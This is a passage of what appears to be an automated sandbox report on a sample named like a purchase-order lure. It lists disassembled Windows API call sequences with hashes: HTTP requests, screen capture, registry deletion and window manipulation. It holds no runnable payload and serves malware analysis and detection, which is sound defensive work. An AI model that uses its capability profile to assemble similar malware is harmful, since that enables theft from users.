                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 221274066-3440237614
                          • Opcode ID: 0623cbe15433cb21db0582b443a781fd9abb18c41094bf0c6940749f09911a08
                          • Instruction ID: a0435964fabc499e93f236e16b2809a16612ca63da7ce2bc42e41abb75dae5bc
                          • Opcode Fuzzy Hash: 0623cbe15433cb21db0582b443a781fd9abb18c41094bf0c6940749f09911a08
                          • Instruction Fuzzy Hash: 40618A72508305AFD701EF64DC85DAFBBE8EF89350F40091EF595931A1DB709A48EBA2
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F7C4B0
                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F7C4C3
                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F7C4D7
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F7C4F0
                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F7C533
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F7C549
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F7C554
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F7C584
                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F7C5DC
                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F7C5F0
                          • InternetCloseHandle.WININET(00000000), ref: 00F7C5FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                          • String ID:
                          • API String ID: 3800310941-3916222277
                          • Opcode ID: 2a63a0b5e89c2463e2e93474f32abd852169a9829fa49483f4c8efcdb7d43dc2
                          • Instruction ID: 5df674ff1d5a522357fbbea3dd0857717d6d571bb299c8e7efcd59745b9caa03
                          • Opcode Fuzzy Hash: 2a63a0b5e89c2463e2e93474f32abd852169a9829fa49483f4c8efcdb7d43dc2
                          • Instruction Fuzzy Hash: 40514FB1500609BFDB218FA0CD88AAB7BBCFF04754F04841FF94996150DB35E944ABE2
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F98592
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00F985A2
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F985AD
                          • CloseHandle.KERNEL32(00000000), ref: 00F985BA
                          • GlobalLock.KERNEL32(00000000), ref: 00F985C8
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F985D7
                          • GlobalUnlock.KERNEL32(00000000), ref: 00F985E0
                          • CloseHandle.KERNEL32(00000000), ref: 00F985E7
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00F985F8
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F9FC38,?), ref: 00F98611
                          • GlobalFree.KERNEL32(00000000), ref: 00F98621
                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00F98641
                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00F98671
                          • DeleteObject.GDI32(00000000), ref: 00F98699
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F986AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3840717409-0
                          • Opcode ID: dca884fdd964d64e786f325046817a4c0bb8a5909c0e045112267dabb147ebb7
                          • Instruction ID: 56c363da81f8a8c8339b156bd99a45b7eb5bc95924f0d72d31bfa185a106d278
                          • Opcode Fuzzy Hash: dca884fdd964d64e786f325046817a4c0bb8a5909c0e045112267dabb147ebb7
                          • Instruction Fuzzy Hash: CF412E75A00208AFDB11DF65DD48EAE7BB8FF89761F144059F905EB260DB309D41EB60
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00F71502
                          • VariantCopy.OLEAUT32(?,?), ref: 00F7150B
                          • VariantClear.OLEAUT32(?), ref: 00F71517
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F715FB
                          • VarR8FromDec.OLEAUT32(?,?), ref: 00F71657
                          • VariantInit.OLEAUT32(?), ref: 00F71708
                          • SysFreeString.OLEAUT32(?), ref: 00F7178C
                          • VariantClear.OLEAUT32(?), ref: 00F717D8
                          • VariantClear.OLEAUT32(?), ref: 00F717E7
                          • VariantInit.OLEAUT32(00000000), ref: 00F71823
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 1234038744-3931177956
                          • Opcode ID: f6c311cdaf273ea9cf3ea862e50c83eb554a4a10c91df4d0c53f0334d555cb5b
                          • Instruction ID: 88ac209dac9795d78522cae285d6eb4ecbc6044a77ae65f374d63e7213b4f59f
                          • Opcode Fuzzy Hash: f6c311cdaf273ea9cf3ea862e50c83eb554a4a10c91df4d0c53f0334d555cb5b
                          • Instruction Fuzzy Hash: 3BD1D172A00115EBDF189F69D885BB9B7B5BF44704F18C05BE40AAB181DB34DC49FBA2
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F8C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8B6AE,?,?), ref: 00F8C9B5
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8C9F1
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA68
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8B6F4
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8B772
                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00F8B80A
                          • RegCloseKey.ADVAPI32(?), ref: 00F8B87E
                          • RegCloseKey.ADVAPI32(?), ref: 00F8B89C
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F8B8F2
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F8B904
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F8B922
                          • FreeLibrary.KERNEL32(00000000), ref: 00F8B983
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8B994
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 146587525-4033151799
                          • Opcode ID: 8dd46c7ca106dfe2e56cc985a810b543a23c749cd75cb4f53e8e90a03879c9c8
                          • Instruction ID: ecf5c0bb5ba7b7165a9448daaf14a96b7203ce33314c768aaeafecc9251d2211
                          • Opcode Fuzzy Hash: 8dd46c7ca106dfe2e56cc985a810b543a23c749cd75cb4f53e8e90a03879c9c8
                          • Instruction Fuzzy Hash: FBC18E31608201AFD710EF14C895F6ABBE5BF84318F14859CF59A8B3A2CB75EC45EB91
                          APIs
                          • GetDC.USER32(00000000), ref: 00F825D8
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F825E8
                          • CreateCompatibleDC.GDI32(?), ref: 00F825F4
                          • SelectObject.GDI32(00000000,?), ref: 00F82601
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F8266D
                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F826AC
                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F826D0
                          • SelectObject.GDI32(?,?), ref: 00F826D8
                          • DeleteObject.GDI32(?), ref: 00F826E1
                          • DeleteDC.GDI32(?), ref: 00F826E8
                          • ReleaseDC.USER32(00000000,?), ref: 00F826F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: f5fe92e347b90c4c208c3e282d4daded2cad1717c127dd8dec439c443276333a
                          • Instruction ID: 6f08acf2325d8f56361faf9394f34e2fa46db2f21670482aaa123db0237e46a3
                          • Opcode Fuzzy Hash: f5fe92e347b90c4c208c3e282d4daded2cad1717c127dd8dec439c443276333a
                          • Instruction Fuzzy Hash: A661F175D00219EFCF04DFA8DC84AAEBBB5FF48310F20852AE955A7250E774A941DFA4
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 00F3DAA1
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D659
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D66B
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D67D
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D68F
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6A1
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6B3
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6C5
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6D7
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6E9
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6FB
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D70D
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D71F
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D731
                          • _free.LIBCMT ref: 00F3DA96
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F3DAB8
                          • _free.LIBCMT ref: 00F3DACD
                          • _free.LIBCMT ref: 00F3DAD8
                          • _free.LIBCMT ref: 00F3DAFA
                          • _free.LIBCMT ref: 00F3DB0D
                          • _free.LIBCMT ref: 00F3DB1B
                          • _free.LIBCMT ref: 00F3DB26
                          • _free.LIBCMT ref: 00F3DB5E
                          • _free.LIBCMT ref: 00F3DB65
                          • _free.LIBCMT ref: 00F3DB82
                          • _free.LIBCMT ref: 00F3DB9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 263ba48cdf176f8cf959f999b358733953a67b3aaef1c8f15473f2018245e0e8
                          • Instruction ID: 4366a4a97d937bd555f7adfea2a032d24102cbf50a00e1159ab38ab1ae955585
                          • Opcode Fuzzy Hash: 263ba48cdf176f8cf959f999b358733953a67b3aaef1c8f15473f2018245e0e8
                          • Instruction Fuzzy Hash: 01314732A042059FEB62AA39FD45B5AB7E9FF40330F154469E459D7192DB39AC80BB20
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 00F6369C
                          • _wcslen.LIBCMT ref: 00F636A7
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F63797
                          • GetClassNameW.USER32(?,?,00000400), ref: 00F6380C
                          • GetDlgCtrlID.USER32(?), ref: 00F6385D
                          • GetWindowRect.USER32(?,?), ref: 00F63882
                          • GetParent.USER32(?), ref: 00F638A0
                          • ScreenToClient.USER32(00000000), ref: 00F638A7
                          • GetClassNameW.USER32(?,?,00000100), ref: 00F63921
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00F6395D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                          • String ID: %s%u
                          • API String ID: 4010501982-679674701
                          • Opcode ID: ba4b5082c0466aa84a895b8104b80731a13d82f076fbb9e2a0fe5a84e1873cb9
                          • Instruction ID: 2b3dc497a1fa4df0438ecf595efa2cd1ff21b0127f5c5a3fe94f0f2b05063791
                          • Opcode Fuzzy Hash: ba4b5082c0466aa84a895b8104b80731a13d82f076fbb9e2a0fe5a84e1873cb9
                          • Instruction Fuzzy Hash: 9091C071604706AFD719DF24C885FEAF7A9FF44360F008629F99AC2190DB34EA45EB91
                          APIs
                          • GetClassNameW.USER32(?,?,00000400), ref: 00F64994
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00F649DA
                          • _wcslen.LIBCMT ref: 00F649EB
                          • CharUpperBuffW.USER32(?,00000000), ref: 00F649F7
                          • _wcsstr.LIBVCRUNTIME ref: 00F64A2C
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00F64A64
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00F64A9D
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00F64AE6
                          • GetClassNameW.USER32(?,?,00000400), ref: 00F64B20
                          • GetWindowRect.USER32(?,?), ref: 00F64B8B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                          • String ID: ThumbnailClass
                          • API String ID: 1311036022-1241985126
                          • Opcode ID: 66a972f58502326c14f28cce4f8bd38c2b53ca3a08d187dcb79c3e59d46539aa
                          • Instruction ID: 95bdd9ee70028daa006f08979493f2ceb08e4b794d6b3dd29bd12843b52506d3
                          • Opcode Fuzzy Hash: 66a972f58502326c14f28cce4f8bd38c2b53ca3a08d187dcb79c3e59d46539aa
                          • Instruction Fuzzy Hash: 6A91C231408205AFDB08EF14C981FAA77E8FF84724F04846AFD859A196DB34FD45EBA1
                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8CC64
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F8CC8D
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F8CD48
                            • Part of subcall function 00F8CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F8CCAA
                            • Part of subcall function 00F8CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F8CCBD
                            • Part of subcall function 00F8CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F8CCCF
                            • Part of subcall function 00F8CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F8CD05
                            • Part of subcall function 00F8CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8CD28
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F8CCF3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2734957052-4033151799
                          • Opcode ID: 58e0c4da9f526fff8ef2740327cbd16c9caf0cb6467f9568ad29016f04379864
                          • Instruction ID: b0ff3c2ad6091d818d303f64bd0e55ca3e174e549b747579bb452374e33ff782
                          • Opcode Fuzzy Hash: 58e0c4da9f526fff8ef2740327cbd16c9caf0cb6467f9568ad29016f04379864
                          • Instruction Fuzzy Hash: E1314B72D0112DBBDB20AB65DC88EEFBB7CEF46750F000166A915E3250DA749A45ABF0
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F73D40
                          • _wcslen.LIBCMT ref: 00F73D6D
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F73D9D
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F73DBE
                          • RemoveDirectoryW.KERNEL32(?), ref: 00F73DCE
                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F73E55
                          • CloseHandle.KERNEL32(00000000), ref: 00F73E60
                          • CloseHandle.KERNEL32(00000000), ref: 00F73E6B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                          • String ID: :$\$\??\%s
                          • API String ID: 1149970189-3457252023
                          • Opcode ID: f12e046060668cea4a2fe983d7356b4e3278bfc1001b442c128b768ec08a9237
                          • Instruction ID: 466062d4e0c28a92f3c4af87e188431999d9af8678876480c71492b481005c39
                          • Opcode Fuzzy Hash: f12e046060668cea4a2fe983d7356b4e3278bfc1001b442c128b768ec08a9237
                          • Instruction Fuzzy Hash: B031A172900219BBDB209BA0DC49FEB37BCEF88710F1081B7F509D6060E7749784AB65
                          APIs
                          • timeGetTime.WINMM ref: 00F6E6B4
                            • Part of subcall function 00F1E551: timeGetTime.WINMM(?,?,00F6E6D4), ref: 00F1E555
                          • Sleep.KERNEL32(0000000A), ref: 00F6E6E1
                          • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00F6E705
                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F6E727
                          • SetActiveWindow.USER32 ref: 00F6E746
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F6E754
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F6E773
                          • Sleep.KERNEL32(000000FA), ref: 00F6E77E
                          • IsWindow.USER32 ref: 00F6E78A
                          • EndDialog.USER32(00000000), ref: 00F6E79B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: fbd7f1ba4dc2a3b53b06482a77726c71e8888c7ba0e0597f8461e0ceffa46e64
                          • Instruction ID: 1be4ccc6f46278b2840b3c064c3c6e5dfa0e81a94d62b10c5a251f3d61d1963e
                          • Opcode Fuzzy Hash: fbd7f1ba4dc2a3b53b06482a77726c71e8888c7ba0e0597f8461e0ceffa46e64
                          • Instruction Fuzzy Hash: 2C21AEBB20030CAFEB015F74EC89A263B6AFB64758B100426F515821A1DB76EC00BBA5
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F6EA5D
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F6EA73
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6EA84
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F6EA96
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F6EAA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: SendString$_wcslen
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2420728520-1007645807
                          • Opcode ID: c397f9cf47b97520c81e793351ae27aa57bdefbba6d207914729c63b54ec5c39
                          • Instruction ID: 6e440a90dbb8d0dd71edf1dbba51295303b70af9171ea1c625213ca138418f69
                          • Opcode Fuzzy Hash: c397f9cf47b97520c81e793351ae27aa57bdefbba6d207914729c63b54ec5c39
                          • Instruction Fuzzy Hash: FD11A335A5421A79D720A7A5DE4BEFF7B7CEFD1B10F4004297401E20D1EEB49905E5B1
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00F65CE2
                          • GetWindowRect.USER32(00000000,?), ref: 00F65CFB
                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F65D59
                          • GetDlgItem.USER32(?,00000002), ref: 00F65D69
